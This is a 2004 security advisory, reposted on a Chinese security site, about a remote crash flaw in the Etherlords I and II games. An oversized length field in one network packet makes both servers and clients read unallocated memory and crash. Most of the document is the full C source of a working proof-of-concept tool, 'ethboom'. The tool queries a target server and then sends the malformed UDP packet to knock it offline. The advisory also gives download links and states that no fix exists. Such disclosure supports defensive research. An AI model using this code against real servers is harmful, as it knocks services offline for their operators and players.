Remote crash in Etherlords I 1.07 and II 1.03

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Remote crash in Etherlords I 1.07 and II 1.03

来源：vfocus.net 作者：vitter 发布时间：2004-03-26

#######################################################################

Luigi Auriemma

Application: - Etherlords I
http://www.etherlords.com/etherlords1/
- Etherlords II
http://www.etherlords.com
Versions: Etherlords I <= 1.07
Etherlords II <= 1.03
Platforms: Windows
Bug: reading of unallocated memory (crash)
Risk: medium
Exploitation: remote, versus server and client
Date: 25 Mar 2004
Author: Luigi Auriemma
e-mail: aluigi@altervista.org
web: http://aluigi.altervista.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Etherlords is a 3D turn based game developed by Nival
(http://www.nival.com).
Etherlords I was released at November 2001 while the second game has
been released at October 2003.

#######################################################################

======
2) Bug
======

The packet signed by the number 3 is usually sent by the server to the
client and contains a 16 bit value at offset 9 used to specify the size
of the data block that follows it.

If this number is too big the game will read also the unallocated
memory after the packet and will crash immediately.

The following memcpy() instruction comes from Etherlords II 1.03 and
is exactly where the bug happens:

:0076FD4B C1E902 shr ecx, 02
:0076FD4E F3A5 rep movsd
:0076FD50 8BCA mov ecx, edx
:0076FD52 83E103 and ecx, 003
:0076FD55 F3A4 rep movsb

The nice thing is that the packet 3 can also be used versus the server
that in fact will manage it just as the client does and will crash.

#######################################################################

===========
3) The Code
===========

http://aluigi.altervista.org/poc/ethboom.zip
http://vfocus.net/download/down/ethboom.zip

---------------------------------ethboom.c-----------------------------
/*

by Luigi Auriemma

UNIX & WIN VERSION
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#define VER "0.1"
#define BUFFSZ 2048
#define PORT 9990
#define TIMEOUT 5
#define INFO "\x02" "\xde\xad\xc0\xde"
#define PCK "\x03" \
"\x00\x00\x00\x00" \
"\x00\x31\x14\x45" \
"\xff\xff" /* BOOM */

int timeout(int sock);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
int sd,
len,
psz;
u_short port = PORT;
u_char *buff;
struct sockaddr_in peer;

setbuf(stdout, NULL);

fputs("\n"
"Etherlords 1 (1.07) and 2 (1.03) server crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 2) {
printf("\n"
"Usage: %s <server> [port(%d)]\n"
"\n", argv[0], PORT);
exit(1);
}

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
psz = sizeof(peer);

printf("\nTarget %s:%hu\n\n",
inet_ntoa(peer.sin_addr), port);

sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();

fputs("- Getting informations:\n", stdout);
if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, psz)
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nError: socket timeout, probably the server is not online\n", stdout);
exit(1);
}

buff = malloc(BUFFSZ);
if(!buff) std_err();

if(recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz)
< 0) std_err();

if(*buff == 3) {
len = buff[11] >> 1;
printf(" Players: %lu\n", *(u_long *)(buff + len + 12));
buff[len + 12] = 0x00;
printf(" Admin nickname: %s\n", buff + 12);
printf(" Resource level: %lu\n", *(u_long *)(buff + len + 12 + 4));
} else {
fputs("\nError: Wrong packet from the server, I exit\n", stdout);
exit(1);
}

fputs("- Sending BOOM packet:\n", stdout);
if(sendto(sd, PCK, sizeof(PCK) - 1, 0, (struct sockaddr *)&peer, psz)
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!!!!!\n", stdout);
} else {
fputs("\nServer doesn't seem to be vulnerable\n", stdout);
}
close(sd);

return(0);
}

int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;

tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)hp->h_addr;
}
return(host_ip);
}

#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
--------------------END-------------------------------------------

---------------------------winerr.h--------------------------------------
/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/

#include <string.h>
#include <errno.h>

void std_err(void) {
char *error;

switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error = "Operation would block"; break;
case 10036: error = "Operation now in progress"; break;
case 10037: error = "Operation already in progress"; break;
case 10038: error = "Socket operation on non-socket"; break;
case 10039: error = "Destination address required"; break;
case 10040: error = "Message too long"; break;
case 10041: error = "Protocol wrong type for socket"; break;
case 10042: error = "Bad protocol option"; break;
case 10043: error = "Protocol not supported"; break;
case 10044: error = "Socket type not supported"; break;
case 10045: error = "Operation not supported on socket"; break;
case 10046: error = "Protocol family not supported"; break;
case 10047: error = "Address family not supported by protocol family"; break;
case 10048: error = "Address already in use"; break;
case 10049: error = "Can't assign requested address"; break;
case 10050: error = "Network is down"; break;
case 10051: error = "Network is unreachable"; break;
case 10052: error = "Net dropped connection or reset"; break;
case 10053: error = "Software caused connection abort"; break;
case 10054: error = "Connection reset by peer"; break;
case 10055: error = "No buffer space available"; break;
case 10056: error = "Socket is already connected"; break;
case 10057: error = "Socket is not connected"; break;
case 10058: error = "Can't send after socket shutdown"; break;
case 10059: error = "Too many references, can't splice"; break;
case 10060: error = "Connection timed out"; break;
case 10061: error = "Connection refused"; break;
case 10062: error = "Too many levels of symbolic links"; break;
case 10063: error = "File name too long"; break;
case 10064: error = "Host is down"; break;
case 10065: error = "No Route to Host"; break;
case 10066: error = "Directory not empty"; break;
case 10067: error = "Too many processes"; break;
case 10068: error = "Too many users"; break;
case 10069: error = "Disc Quota Exceeded"; break;
case 10070: error = "Stale NFS file handle"; break;
case 10091: error = "Network SubSystem is unavailable"; break;
case 10092: error = "WINSOCK DLL Version out of range"; break;
case 10093: error = "Successful WSASTARTUP not yet performed"; break;
case 10071: error = "Too many levels of remote in path"; break;
case 11001: error = "Host not found"; break;
case 11002: error = "Non-Authoritative Host not found"; break;
case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "Valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "\nError: %s\n", error);
exit(1);
}
--------------END-------------------------------------------------

#######################################################################

======
4) Fix
======

No fix.
No reply from developers.

#######################################################################

[